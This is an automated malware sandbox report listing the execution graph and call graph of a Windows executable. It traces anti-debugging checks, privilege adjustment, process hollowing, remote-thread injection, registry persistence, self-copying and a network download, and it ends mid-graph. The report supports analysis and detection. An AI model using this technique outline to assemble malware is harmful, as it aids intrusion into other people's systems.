                                                                                                                                                                                                                          • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4254243056-0
                                                                                                                                                                                                                          • Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                                                                                                                                                                                                          • Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:38.5%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:481
                                                                                                                                                                                                                          Total number of Limit Nodes:9
                                                                                                                                                                                                                          execution_graph 1362 7ff7e52b33cc 1365 7ff7e52b2048 GetModuleFileNameW 1362->1365 1366 7ff7e52b20c9 1365->1366 1372 7ff7e52b20c4 1365->1372 1367 7ff7e52b2107 1366->1367 1368 7ff7e52b211d 1366->1368 1369 7ff7e52b2111 1367->1369 1370 7ff7e52b213b 1367->1370 1408 7ff7e52b1f88 ExpandEnvironmentStringsW 1368->1408 1369->1372 1410 7ff7e52b2008 ExpandEnvironmentStringsW 1369->1410 1409 7ff7e52b1fc8 ExpandEnvironmentStringsW 1370->1409 1373 7ff7e52b2132 1373->1372 1376 7ff7e52b218d CreateProcessW 1373->1376 1376->1372 1377 7ff7e52b21e8 CreateFileW 1376->1377 1377->1372 1378 7ff7e52b222f GetFileSize 1377->1378 1379 7ff7e52b2257 CloseHandle 1378->1379 1380 7ff7e52b224d 1378->1380 1379->1372 1380->1379 1381 7ff7e52b2267 VirtualAlloc 1380->1381 1382 7ff7e52b22a1 ReadFile 1381->1382 1383 7ff7e52b2291 CloseHandle 1381->1383 1384 7ff7e52b22f1 CloseHandle GetThreadContext 1382->1384 1385 7ff7e52b22ce VirtualFree CloseHandle 1382->1385 1383->1372 1386 7ff7e52b2341 VirtualFree 1384->1386 1387 7ff7e52b2359 ReadProcessMemory GetModuleHandleA GetProcAddress 1384->1387 1385->1372 1386->1372 1388 7ff7e52b23dc 1387->1388 1389 7ff7e52b23e0 VirtualFree 1388->1389 1390 7ff7e52b23f8 VirtualAllocEx 1388->1390 1389->1372 1391 7ff7e52b2463 VirtualFree 1390->1391 1392 7ff7e52b247b WriteProcessMemory 1390->1392 1391->1372 1393 7ff7e52b24b1 VirtualFree 1392->1393 1395 7ff7e52b24c9 1392->1395 1393->1372 1394 7ff7e52b24ff WriteProcessMemory 1394->1395 1396 7ff7e52b258a VirtualFree 1394->1396 1395->1394 1399 7ff7e52b25a7 1395->1399 1396->1372 1397 7ff7e52b2619 RtlCompareMemory 1397->1399 1400 7ff7e52b266c 1397->1400 1398 7ff7e52b2898 WriteProcessMemory SetThreadContext 1401 7ff7e52b2933 ResumeThread 1398->1401 1402 7ff7e52b291e VirtualFree 1398->1402 1399->1397 1399->1398 1405 7ff7e52b2893 1400->1405 1406 7ff7e52b279c ReadProcessMemory WriteProcessMemory 1400->1406 1403 7ff7e52b2945 VirtualFree 1401->1403 1404 7ff7e52b295a VirtualFree 1401->1404 1402->1372 1403->1372 1404->1372 1405->1398 1406->1400 1407 7ff7e52b2871 VirtualFree 1406->1407 1407->1372 1408->1373 1409->1373 1410->1373 1423 7ff7e52b338c 1424 7ff7e52b2048 36 API calls 1423->1424 1425 7ff7e52b339c 1424->1425 1426 7ff7e52b2f0c CreateMutexA 1427 7ff7e52b2f31 ReleaseMutex CloseHandle 1426->1427 1428 7ff7e52b2f4e GetLastError 1426->1428 1429 7ff7e52b2f90 1427->1429 1430 7ff7e52b2f78 ReleaseMutex CloseHandle 1428->1430 1431 7ff7e52b2f5b ReleaseMutex CloseHandle 1428->1431 1430->1429 1431->1429 1432 7ff7e52b31ec 1433 7ff7e52b31f5 1432->1433 1434 7ff7e52b320e 1433->1434 1437 7ff7e52b306c 1433->1437 1442 7ff7e52b2e6c CreateMutexA 1437->1442 1440 7ff7e52b3087 Sleep CreateThread WaitForSingleObject 1441 7ff7e52b30cc Sleep 1440->1441 1441->1433 1443 7ff7e52b2eb5 GetLastError 1442->1443 1444 7ff7e52b2e98 ReleaseMutex CloseHandle 1442->1444 1446 7ff7e52b2ec2 ReleaseMutex CloseHandle 1443->1446 1447 7ff7e52b2edf ReleaseMutex CloseHandle 1443->1447 1445 7ff7e52b2ef7 1444->1445 1445->1440 1445->1441 1446->1445 1447->1445 838 7ff7e52b345c 897 7ff7e52b10a0 838->897 843 7ff7e52b3474 ExitProcess 844 7ff7e52b347c 1131 7ff7e52b4264 GetCurrentProcess OpenProcessToken 844->1131 848 7ff7e52b3497 849 7ff7e52b34fb 848->849 850 7ff7e52b34ac 848->850 853 7ff7e52b3510 849->853 854 7ff7e52b354c 849->854 1146 7ff7e52b43a4 CreateMutexExA 850->1146 856 7ff7e52b43a4 3 API calls 853->856 860 7ff7e52b3561 854->860 861 7ff7e52b35a2 854->861 855 7ff7e52b34d2 ExitProcess 858 7ff7e52b351c 856->858 857 7ff7e52b43a4 3 API calls 859 7ff7e52b34cb 857->859 862 7ff7e52b3523 ExitProcess 858->862 863 7ff7e52b352b 858->863 859->855 864 7ff7e52b34da 859->864 865 7ff7e52b43a4 3 API calls 860->865 1164 7ff7e52b3a74 861->1164 1159 7ff7e52b327c 863->1159 1150 7ff7e52b32ec 864->1150 869 7ff7e52b356d 865->869 873 7ff7e52b3574 ExitProcess 869->873 874 7ff7e52b357c 869->874 870 7ff7e52b3530 875 7ff7e52b3544 ExitProcess 870->875 876 7ff7e52b3537 Sleep 870->876 872 7ff7e52b34df 878 7ff7e52b34e6 Sleep 872->878 879 7ff7e52b34f3 ExitProcess 872->879 880 7ff7e52b327c 20 API calls 874->880 876->870 878->872 882 7ff7e52b3581 880->882 885 7ff7e52b3595 ExitProcess 882->885 886 7ff7e52b3588 Sleep 882->886 883 7ff7e52b35ba 887 7ff7e52b43a4 3 API calls 883->887 884 7ff7e52b360e 7 API calls 886->882 888 7ff7e52b35c6 887->888 889 7ff7e52b35e0 ExitProcess 888->889 890 7ff7e52b43a4 3 API calls 888->890 891 7ff7e52b35d9 890->891 891->889 892 7ff7e52b35e8 891->892 893 7ff7e52b32ec 47 API calls 892->893 894 7ff7e52b35ed 893->894 895 7ff7e52b3601 ExitProcess 894->895 896 7ff7e52b35f4 Sleep 894->896 896->894 1174 7ff7e52b1000 LoadLibraryA GetProcAddress 897->1174 899 7ff7e52b113a 1175 7ff7e52b1000 LoadLibraryA GetProcAddress 899->1175 901 7ff7e52b1154 1176 7ff7e52b1050 LoadLibraryA GetProcAddress 901->1176 903 7ff7e52b116e 1177 7ff7e52b1050 LoadLibraryA GetProcAddress 903->1177 905 7ff7e52b1188 1178 7ff7e52b1050 LoadLibraryA GetProcAddress 905->1178 907 7ff7e52b11a2 1179 7ff7e52b1050 LoadLibraryA GetProcAddress 907->1179 909 7ff7e52b11bc 1180 7ff7e52b1050 LoadLibraryA GetProcAddress 909->1180 911 7ff7e52b11d6 1181 7ff7e52b1050 LoadLibraryA GetProcAddress 911->1181 913 7ff7e52b11f0 1182 7ff7e52b1050 LoadLibraryA GetProcAddress 913->1182 915 7ff7e52b120a 1183 7ff7e52b1050 LoadLibraryA GetProcAddress 915->1183 917 7ff7e52b1224 1184 7ff7e52b1050 LoadLibraryA GetProcAddress 917->1184 919 7ff7e52b123e 1185 7ff7e52b1000 LoadLibraryA GetProcAddress 919->1185 921 7ff7e52b1258 1186 7ff7e52b1000 LoadLibraryA GetProcAddress 921->1186 923 7ff7e52b1272 1187 7ff7e52b1000 LoadLibraryA GetProcAddress 923->1187 925 7ff7e52b128c 1188 7ff7e52b1000 LoadLibraryA GetProcAddress 925->1188 927 7ff7e52b12a6 1189 7ff7e52b1050 LoadLibraryA GetProcAddress 927->1189 929 7ff7e52b12c0 1190 7ff7e52b1050 LoadLibraryA GetProcAddress 929->1190 931 7ff7e52b12da 1191 7ff7e52b1050 LoadLibraryA GetProcAddress 931->1191 933 7ff7e52b12f4 1192 7ff7e52b1050 LoadLibraryA GetProcAddress 933->1192 935 7ff7e52b130e 1193 7ff7e52b1050 LoadLibraryA GetProcAddress 935->1193 937 7ff7e52b1328 1194 7ff7e52b1050 LoadLibraryA GetProcAddress 937->1194 939 7ff7e52b1342 1195 7ff7e52b1050 LoadLibraryA GetProcAddress 939->1195 941 7ff7e52b135c 1196 7ff7e52b1050 LoadLibraryA GetProcAddress 941->1196 943 7ff7e52b1376 1197 7ff7e52b1050 LoadLibraryA GetProcAddress 943->1197 945 7ff7e52b1390 1198 7ff7e52b1050 LoadLibraryA GetProcAddress 945->1198 947 7ff7e52b13aa 1199 7ff7e52b1050 LoadLibraryA GetProcAddress 947->1199 949 7ff7e52b13c4 1200 7ff7e52b1050 LoadLibraryA GetProcAddress 949->1200 951 7ff7e52b13de 1201 7ff7e52b1050 LoadLibraryA GetProcAddress 951->1201 953 7ff7e52b13f8 1202 7ff7e52b1050 LoadLibraryA GetProcAddress 953->1202 955 7ff7e52b1412 1203 7ff7e52b1050 LoadLibraryA GetProcAddress 955->1203 957 7ff7e52b142c 1204 7ff7e52b1050 LoadLibraryA GetProcAddress 957->1204 959 7ff7e52b1446 1205 7ff7e52b1050 LoadLibraryA GetProcAddress 959->1205 961 7ff7e52b1460 1206 7ff7e52b1050 LoadLibraryA GetProcAddress 961->1206 963 7ff7e52b147a 1207 7ff7e52b1050 LoadLibraryA GetProcAddress 963->1207 965 7ff7e52b1494 1208 7ff7e52b1050 LoadLibraryA GetProcAddress 965->1208 967 7ff7e52b14ae 1209 7ff7e52b1050 LoadLibraryA GetProcAddress 967->1209 969 7ff7e52b14c8 1210 7ff7e52b1050 LoadLibraryA GetProcAddress 969->1210 971 7ff7e52b14e2 1211 7ff7e52b1050 LoadLibraryA GetProcAddress 971->1211 973 7ff7e52b14fc 1212 7ff7e52b1050 LoadLibraryA GetProcAddress 973->1212 975 7ff7e52b1516 1213 7ff7e52b1050 LoadLibraryA GetProcAddress 975->1213 977 7ff7e52b1530 1214 7ff7e52b1050 LoadLibraryA GetProcAddress 977->1214 979 7ff7e52b154a 1215 7ff7e52b1050 LoadLibraryA GetProcAddress 979->1215 981 7ff7e52b1564 1216 7ff7e52b1050 LoadLibraryA GetProcAddress 981->1216 983 7ff7e52b157e 1217 7ff7e52b1050 LoadLibraryA GetProcAddress 983->1217 985 7ff7e52b1598 1218 7ff7e52b1050 LoadLibraryA GetProcAddress 985->1218 987 7ff7e52b15b2 1219 7ff7e52b1050 LoadLibraryA GetProcAddress 987->1219 989 7ff7e52b15cc 1220 7ff7e52b1050 LoadLibraryA GetProcAddress 989->1220 991 7ff7e52b15e6 1221 7ff7e52b1050 LoadLibraryA GetProcAddress 991->1221 993 7ff7e52b1600 1222 7ff7e52b1050 LoadLibraryA GetProcAddress 993->1222 995 7ff7e52b161a 1223 7ff7e52b1050 LoadLibraryA GetProcAddress 995->1223 997 7ff7e52b1634 1224 7ff7e52b1050 LoadLibraryA GetProcAddress 997->1224 999 7ff7e52b164e 1225 7ff7e52b1050 LoadLibraryA GetProcAddress 999->1225 1001 7ff7e52b1668 1226 7ff7e52b1050 LoadLibraryA GetProcAddress 1001->1226 1003 7ff7e52b1682 1227 7ff7e52b1050 LoadLibraryA GetProcAddress 1003->1227 1005 7ff7e52b169c 1228 7ff7e52b1050 LoadLibraryA GetProcAddress 1005->1228 1007 7ff7e52b16b6 1229 7ff7e52b1050 LoadLibraryA GetProcAddress 1007->1229 1009 7ff7e52b16d0 1230 7ff7e52b1050 LoadLibraryA GetProcAddress 1009->1230 1011 7ff7e52b16ea 1231 7ff7e52b1050 LoadLibraryA GetProcAddress 1011->1231 1013 7ff7e52b1704 1232 7ff7e52b1050 LoadLibraryA GetProcAddress 1013->1232 1015 7ff7e52b171e 1233 7ff7e52b1050 LoadLibraryA GetProcAddress 1015->1233 1017 7ff7e52b1738 1234 7ff7e52b1050 LoadLibraryA GetProcAddress 1017->1234 1019 7ff7e52b1752 1235 7ff7e52b1050 LoadLibraryA GetProcAddress 1019->1235 1021 7ff7e52b176c 1236 7ff7e52b1050 LoadLibraryA GetProcAddress 1021->1236 1023 7ff7e52b1786 1237 7ff7e52b1050 LoadLibraryA GetProcAddress 1023->1237 1025 7ff7e52b17a0 1238 7ff7e52b1050 LoadLibraryA GetProcAddress 1025->1238 1027 7ff7e52b17ba 1239 7ff7e52b1050 LoadLibraryA GetProcAddress 1027->1239 1029 7ff7e52b17d4 1240 7ff7e52b1050 LoadLibraryA GetProcAddress 1029->1240 1031 7ff7e52b17ee 1241 7ff7e52b1050 LoadLibraryA GetProcAddress 1031->1241 1033 7ff7e52b1808 1242 7ff7e52b1050 LoadLibraryA GetProcAddress 1033->1242 1035 7ff7e52b1822 1243 7ff7e52b1050 LoadLibraryA GetProcAddress 1035->1243 1037 7ff7e52b183c 1244 7ff7e52b1050 LoadLibraryA GetProcAddress 1037->1244 1039 7ff7e52b1856 1245 7ff7e52b1050 LoadLibraryA GetProcAddress 1039->1245 1041 7ff7e52b1870 1246 7ff7e52b1050 LoadLibraryA GetProcAddress 1041->1246 1043 7ff7e52b188a 1247 7ff7e52b1050 LoadLibraryA GetProcAddress 1043->1247 1045 7ff7e52b18a4 1248 7ff7e52b1050 LoadLibraryA GetProcAddress 1045->1248 1047 7ff7e52b18be 1249 7ff7e52b1050 LoadLibraryA GetProcAddress 1047->1249 1049 7ff7e52b18d8 1250 7ff7e52b1050 LoadLibraryA GetProcAddress 1049->1250 1051 7ff7e52b18f2 1251 7ff7e52b1050 LoadLibraryA GetProcAddress 1051->1251 1053 7ff7e52b190c 1252 7ff7e52b1050 LoadLibraryA GetProcAddress 1053->1252 1055 7ff7e52b1926 1253 7ff7e52b1050 LoadLibraryA GetProcAddress 1055->1253 1057 7ff7e52b1940 1254 7ff7e52b1050 LoadLibraryA GetProcAddress 1057->1254 1059 7ff7e52b195a 1255 7ff7e52b1050 LoadLibraryA GetProcAddress 1059->1255 1061 7ff7e52b1974 1256 7ff7e52b1050 LoadLibraryA GetProcAddress 1061->1256 1063 7ff7e52b198e 1257 7ff7e52b1050 LoadLibraryA GetProcAddress 1063->1257 1065 7ff7e52b19a8 1258 7ff7e52b1050 LoadLibraryA GetProcAddress 1065->1258 1067 7ff7e52b19c2 1259 7ff7e52b1050 LoadLibraryA GetProcAddress 1067->1259 1069 7ff7e52b19dc 1260 7ff7e52b1050 LoadLibraryA GetProcAddress 1069->1260 1071 7ff7e52b19f6 1261 7ff7e52b1050 LoadLibraryA GetProcAddress 1071->1261 1073 7ff7e52b1a10 1262 7ff7e52b1050 LoadLibraryA GetProcAddress 1073->1262 1075 7ff7e52b1a2a 1263 7ff7e52b1050 LoadLibraryA GetProcAddress 1075->1263 1077 7ff7e52b1a44 1264 7ff7e52b1050 LoadLibraryA GetProcAddress 1077->1264 1079 7ff7e52b1a5e 1265 7ff7e52b1050 LoadLibraryA GetProcAddress 1079->1265 1081 7ff7e52b1a78 1266 7ff7e52b1050 LoadLibraryA GetProcAddress 1081->1266 1083 7ff7e52b1a92 1267 7ff7e52b1050 LoadLibraryA GetProcAddress 1083->1267 1085 7ff7e52b1aac 1268 7ff7e52b1050 LoadLibraryA GetProcAddress 1085->1268 1087 7ff7e52b1ac6 1269 7ff7e52b1050 LoadLibraryA GetProcAddress 1087->1269 1089 7ff7e52b1ae0 1270 7ff7e52b1050 LoadLibraryA GetProcAddress 1089->1270 1091 7ff7e52b1afa 1271 7ff7e52b1050 LoadLibraryA GetProcAddress 1091->1271 1093 7ff7e52b1b14 1272 7ff7e52b1050 LoadLibraryA GetProcAddress 1093->1272 1095 7ff7e52b1b2e 1273 7ff7e52b1000 LoadLibraryA GetProcAddress 1095->1273 1097 7ff7e52b1b48 1274 7ff7e52b1050 LoadLibraryA GetProcAddress 1097->1274 1099 7ff7e52b1b62 1275 7ff7e52b1050 LoadLibraryA GetProcAddress 1099->1275 1101 7ff7e52b1b7c 1276 7ff7e52b1050 LoadLibraryA GetProcAddress 1101->1276 1103 7ff7e52b1b96 1277 7ff7e52b1050 LoadLibraryA GetProcAddress 1103->1277 1105 7ff7e52b1bb0 1278 7ff7e52b1050 LoadLibraryA GetProcAddress 1105->1278 1107 7ff7e52b1bca 1279 7ff7e52b1050 LoadLibraryA GetProcAddress 1107->1279 1109 7ff7e52b1be4 1280 7ff7e52b1050 LoadLibraryA GetProcAddress 1109->1280 1111 7ff7e52b1bfe 1281 7ff7e52b1000 LoadLibraryA GetProcAddress 1111->1281 1113 7ff7e52b1c18 1282 7ff7e52b1000 LoadLibraryA GetProcAddress 1113->1282 1115 7ff7e52b1c32 1283 7ff7e52b1050 LoadLibraryA GetProcAddress 1115->1283 1117 7ff7e52b1c4c 1284 7ff7e52b1050 LoadLibraryA GetProcAddress 1117->1284 1119 7ff7e52b1c66 1285 7ff7e52b1050 LoadLibraryA GetProcAddress 1119->1285 1121 7ff7e52b1c80 1286 7ff7e52b1050 LoadLibraryA GetProcAddress 1121->1286 1123 7ff7e52b1c9a 1287 7ff7e52b1050 LoadLibraryA GetProcAddress 1123->1287 1125 7ff7e52b1cb4 1288 7ff7e52b1050 LoadLibraryA GetProcAddress 1125->1288 1127 7ff7e52b1cce 1128 7ff7e52b321c IsDebuggerPresent 1127->1128 1129 7ff7e52b322a 1128->1129 1130 7ff7e52b322e GetCurrentProcess CheckRemoteDebuggerPresent 1128->1130 1129->843 1129->844 1130->1129 1132 7ff7e52b3481 1131->1132 1133 7ff7e52b428a GetTokenInformation 1131->1133 1142 7ff7e52b3ce4 GetModuleFileNameW 1132->1142 1289 7ff7e52b3b54 VirtualAlloc 1133->1289 1135 7ff7e52b42bb GetTokenInformation 1136 7ff7e52b4302 AdjustTokenPrivileges CloseHandle 1135->1136 1137 7ff7e52b42e8 CloseHandle 1135->1137 1290 7ff7e52b3b24 1136->1290 1138 7ff7e52b3b24 VirtualFree 1137->1138 1139 7ff7e52b42fd 1138->1139 1139->1132 1143 7ff7e52b3dd2 wcsncpy 1142->1143 1144 7ff7e52b3d0f PathFindFileNameW wcslen 1142->1144 1145 7ff7e52b3d49 1143->1145 1144->1145 1145->848 1147 7ff7e52b43d0 GetLastError 1146->1147 1148 7ff7e52b34b8 1146->1148 1147->1148 1149 7ff7e52b43dd CloseHandle 1147->1149 1148->855 1148->857 1149->1148 1293 7ff7e52b38c4 1150->1293 1152 7ff7e52b32fd 1296 7ff7e52b46e4 CreateFileW 1152->1296 1154 7ff7e52b3357 CreateThread 1154->872 1155 7ff7e52b3315 1155->1154 1308 7ff7e52b40c4 1155->1308 1160 7ff7e52b38c4 11 API calls 1159->1160 1161 7ff7e52b328c 1160->1161 1347 7ff7e52b44b4 CreateFileW 1161->1347 1165 7ff7e52b3744 3 API calls 1164->1165 1166 7ff7e52b3a9f 1165->1166 1167 7ff7e52b38c4 11 API calls 1166->1167 1168 7ff7e52b3aa9 GetModuleFileNameW DeleteFileW CopyFileW 1167->1168 1169 7ff7e52b35a7 1168->1169 1170 7ff7e52b3aeb SetFileAttributesW 1168->1170 1172 7ff7e52b33ec GetVersionExW 1169->1172 1359 7ff7e52b39b4 RegOpenKeyExW 1170->1359 1173 7ff7e52b341d 1172->1173 1173->883 1173->884 1174->899 1175->901 1176->903 1177->905 1178->907 1179->909 1180->911 1181->913 1182->915 1183->917 1184->919 1185->921 1186->923 1187->925 1188->927 1189->929 1190->931 1191->933 1192->935 1193->937 1194->939 1195->941 1196->943 1197->945 1198->947 1199->949 1200->951 1201->953 1202->955 1203->957 1204->959 1205->961 1206->963 1207->965 1208->967 1209->969 1210->971 1211->973 1212->975 1213->977 1214->979 1215->981 1216->983 1217->985 1218->987 1219->989 1220->991 1221->993 1222->995 1223->997 1224->999 1225->1001 1226->1003 1227->1005 1228->1007 1229->1009 1230->1011 1231->1013 1232->1015 1233->1017 1234->1019 1235->1021 1236->1023 1237->1025 1238->1027 1239->1029 1240->1031 1241->1033 1242->1035 1243->1037 1244->1039 1245->1041 1246->1043 1247->1045 1248->1047 1249->1049 1250->1051 1251->1053 1252->1055 1253->1057 1254->1059 1255->1061 1256->1063 1257->1065 1258->1067 1259->1069 1260->1071 1261->1073 1262->1075 1263->1077 1264->1079 1265->1081 1266->1083 1267->1085 1268->1087 1269->1089 1270->1091 1271->1093 1272->1095 1273->1097 1274->1099 1275->1101 1276->1103 1277->1105 1278->1107 1279->1109 1280->1111 1281->1113 1282->1115 1283->1117 1284->1119 1285->1121 1286->1123 1287->1125 1288->1127 1289->1135 1291 7ff7e52b3b35 VirtualFree 1290->1291 1292 7ff7e52b3b48 1290->1292 1291->1292 1292->1132 1323 7ff7e52b3744 GetWindowsDirectoryW 1293->1323 1295 7ff7e52b38f3 8 API calls 1295->1152 1297 7ff7e52b4745 GetFileSize GetProcessHeap RtlAllocateHeap 1296->1297 1298 7ff7e52b473e 1296->1298 1299 7ff7e52b47a0 ReadFile 1297->1299 1300 7ff7e52b478e CloseHandle 1297->1300 1298->1155 1301 7ff7e52b47ef 1299->1301 1302 7ff7e52b47c7 GetProcessHeap HeapFree CloseHandle 1299->1302 1300->1298 1303 7ff7e52b4808 GetProcessHeap HeapFree CloseHandle 1301->1303 1306 7ff7e52b4830 1301->1306 1302->1298 1303->1298 1304 7ff7e52b499b GetProcessHeap RtlFreeHeap CloseHandle 1304->1298 1305 7ff7e52b48eb GetProcessHeap RtlAllocateHeap 1307 7ff7e52b4934 1305->1307 1306->1304 1306->1305 1307->1304 1328 7ff7e52b4004 CreateToolhelp32Snapshot 1308->1328 1311 7ff7e52b40e4 1312 7ff7e52b414b GetCurrentProcess OpenProcessToken 1311->1312 1313 7ff7e52b41c2 OpenProcess 1312->1313 1314 7ff7e52b4168 LookupPrivilegeValueW 1312->1314 1320 7ff7e52b41ee 1313->1320 1322 7ff7e52b41e4 1313->1322 1315 7ff7e52b4190 AdjustTokenPrivileges 1314->1315 1316 7ff7e52b41b7 CloseHandle 1314->1316 1315->1316 1316->1313 1318 7ff7e52b424f 1318->1154 1319 7ff7e52b4244 CloseHandle 1319->1318 1321 7ff7e52b4222 WaitForSingleObject 1320->1321 1320->1322 1335 7ff7e52b2cb8 1320->1335 1321->1312 1321->1322 1322->1318 1322->1319 1324 7ff7e52b3798 GetVolumeInformationW 1323->1324 1325 7ff7e52b378e 1323->1325 1326 7ff7e52b3814 1324->1326 1325->1324 1327 7ff7e52b387e wsprintfW 1326->1327 1327->1295 1329 7ff7e52b403f Process32FirstW 1328->1329 1330 7ff7e52b3342 1328->1330 1331 7ff7e52b4099 CloseHandle 1329->1331 1332 7ff7e52b405e wcscmp 1329->1332 1330->1311 1331->1330 1333 7ff7e52b4082 Process32NextW 1332->1333 1334 7ff7e52b4075 1332->1334 1333->1331 1333->1332 1334->1331 1336 7ff7e52b2d0b 1335->1336 1338 7ff7e52b2d4d VirtualAllocEx 1336->1338 1341 7ff7e52b2d2b 1336->1341 1343 7ff7e52b2a88 1336->1343 1339 7ff7e52b2d87 WriteProcessMemory 1338->1339 1338->1341 1340 7ff7e52b2dd0 VirtualProtectEx 1339->1340 1339->1341 1340->1341 1342 7ff7e52b2e03 CreateRemoteThread 1340->1342 1341->1320 1342->1336 1342->1341 1344 7ff7e52b2b01 1343->1344 1345 7ff7e52b2c0a StrStrA 1344->1345 1346 7ff7e52b2b08 1344->1346 1345->1344 1345->1346 1346->1336 1348 7ff7e52b450a 1347->1348 1349 7ff7e52b452b GetLastError 1347->1349 1353 7ff7e52b4404 GetFileSize 1348->1353 1350 7ff7e52b329f CreateThread Sleep 1349->1350 1350->870 1358 7ff7e52b3b54 VirtualAlloc 1353->1358 1355 7ff7e52b447a CloseHandle 1355->1350 1356 7ff7e52b4430 1356->1355 1357 7ff7e52b4444 SetFilePointer ReadFile 1356->1357 1357->1355 1358->1356 1360 7ff7e52b39f5 1359->1360 1361 7ff7e52b39f9 RegSetValueExW RegCloseKey 1359->1361 1360->1169 1361->1360 1414 7ff7e52b2f9c 1415 7ff7e52b38c4 11 API calls 1414->1415 1416 7ff7e52b2fdb 1415->1416 1417 7ff7e52b46e4 17 API calls 1416->1417 1418 7ff7e52b2fff 1417->1418 1419 7ff7e52b40c4 5 API calls 1418->1419 1420 7ff7e52b3022 1419->1420 1421 7ff7e52b40e4 13 API calls 1420->1421 1422 7ff7e52b3037 GetProcessHeap HeapFree 1421->1422 1448 7ff7e52b1cdc 1449 7ff7e52b1d06 InternetOpenW 1448->1449 1450 7ff7e52b1d40 InternetOpenUrlW 1449->1450 1451 7ff7e52b1d33 Sleep 1449->1451 1452 7ff7e52b1dc9 HttpQueryInfoA 1450->1452 1453 7ff7e52b1d77 InternetOpenUrlW 1450->1453 1451->1449 1455 7ff7e52b1df8 InternetCloseHandle InternetCloseHandle Sleep 1452->1455 1456 7ff7e52b1e1e 1452->1456 1453->1452 1454 7ff7e52b1dae InternetCloseHandle Sleep 1453->1454 1454->1449 1455->1449 1457 7ff7e52b1e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1456->1457 1458 7ff7e52b1e28 InternetCloseHandle InternetOpenUrlW 1456->1458 1460 7ff7e52b1eea InternetCloseHandle InternetCloseHandle 1457->1460 1463 7ff7e52b1f04 1457->1463 1458->1457 1459 7ff7e52b1e6a InternetCloseHandle Sleep 1458->1459 1459->1449 1461 7ff7e52b1f83 1460->1461 1462 7ff7e52b1f0c InternetReadFile 1462->1463 1464 7ff7e52b1f5a InternetCloseHandle InternetCloseHandle 1462->1464 1463->1462 1463->1464 1464->1461 1465 7ff7e52b30dc 1471 7ff7e52b30e5 1465->1471 1466 7ff7e52b31d1 1469 7ff7e52b3c24 RegDeleteKeyW 1469->1471 1470 7ff7e52b3e24 9 API calls 1470->1471 1471->1466 1471->1469 1471->1470 1472 7ff7e52b39b4 3 API calls 1471->1472 1474 7ff7e52b45c4 CreateFileW 1471->1474 1479 7ff7e52b3b84 RegOpenKeyExW 1471->1479 1473 7ff7e52b31c1 Sleep 1472->1473 1473->1471 1475 7ff7e52b461f 1474->1475 1476 7ff7e52b465a 1474->1476 1482 7ff7e52b4544 SetFilePointer WriteFile SetEndOfFile 1475->1482 1476->1471 1478 7ff7e52b463b SetFileAttributesW CloseHandle 1478->1476 1480 7ff7e52b3c12 1479->1480 1481 7ff7e52b3bd8 RegSetValueExW RegCloseKey 1479->1481 1480->1471 1481->1480 1482->1478

                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                          callgraph 0 Function_00007FF7E52BA052 1 Function_00007FF7E52B1050 2 Function_00007FF7E52BDC55 3 Function_00007FF7E52BCD54 4 Function_00007FF7E52B3B54 5 Function_00007FF7E52B2048 22 Function_00007FF7E52B1F88 5->22 52 Function_00007FF7E52B1FC8 5->52 82 Function_00007FF7E52B2008 5->82 6 Function_00007FF7E52BA04E 7 Function_00007FF7E52BD33F 8 Function_00007FF7E52BDC46 9 Function_00007FF7E52B3744 78 Function_00007FF7E52B3714 9->78 10 Function_00007FF7E52B4544 11 Function_00007FF7E52BD339 12 Function_00007FF7E52BF232 13 Function_00007FF7E52B3B24 14 Function_00007FF7E52B3C24 15 Function_00007FF7E52B3E24 16 Function_00007FF7E52BC91A 17 Function_00007FF7E52BD91D 18 Function_00007FF7E52B321C 19 Function_00007FF7E52BEF92 20 Function_00007FF7E52BA188 21 Function_00007FF7E52B2A88 29 Function_00007FF7E52B2978 21->29 23 Function_00007FF7E52B338C 23->5 24 Function_00007FF7E52BF281 25 Function_00007FF7E52BA27F 26 Function_00007FF7E52B3B84 27 Function_00007FF7E52BA778 28 Function_00007FF7E52BF278 30 Function_00007FF7E52B327C 58 Function_00007FF7E52B38C4 30->58 65 Function_00007FF7E52B44B4 30->65 31 Function_00007FF7E52BA772 32 Function_00007FF7E52BDE70 33 Function_00007FF7E52BA776 34 Function_00007FF7E52B3A74 34->9 34->58 64 Function_00007FF7E52B39B4 34->64 35 Function_00007FF7E52B4674 36 Function_00007FF7E52BC673 37 Function_00007FF7E52B2E6C 38 Function_00007FF7E52B306C 38->37 39 Function_00007FF7E52BA061 40 Function_00007FF7E52BD361 41 Function_00007FF7E52BB15F 42 Function_00007FF7E52BCF65 43 Function_00007FF7E52BD365 44 Function_00007FF7E52B4264 44->4 44->13 45 Function_00007FF7E52B3C64 46 Function_00007FF7E52BA05A 47 Function_00007FF7E52BDE59 48 Function_00007FF7E52BA258 49 Function_00007FF7E52BC65C 50 Function_00007FF7E52B345C 50->18 50->30 50->34 50->44 68 Function_00007FF7E52B10A0 50->68 69 Function_00007FF7E52B43A4 50->69 77 Function_00007FF7E52B3F14 50->77 100 Function_00007FF7E52B32EC 50->100 101 Function_00007FF7E52B33EC 50->101 106 Function_00007FF7E52B3CE4 50->106 51 Function_00007FF7E52BA2D0 53 Function_00007FF7E52B33CC 53->5 54 Function_00007FF7E52BC9CB 55 Function_00007FF7E52BDCC2 56 Function_00007FF7E52BDEC1 57 Function_00007FF7E52BD0C4 58->9 59 Function_00007FF7E52B40C4 87 Function_00007FF7E52B4004 59->87 60 Function_00007FF7E52B45C4 60->10 61 Function_00007FF7E52BD8B8 62 Function_00007FF7E52B2CB8 62->21 63 Function_00007FF7E52BEBBE 88 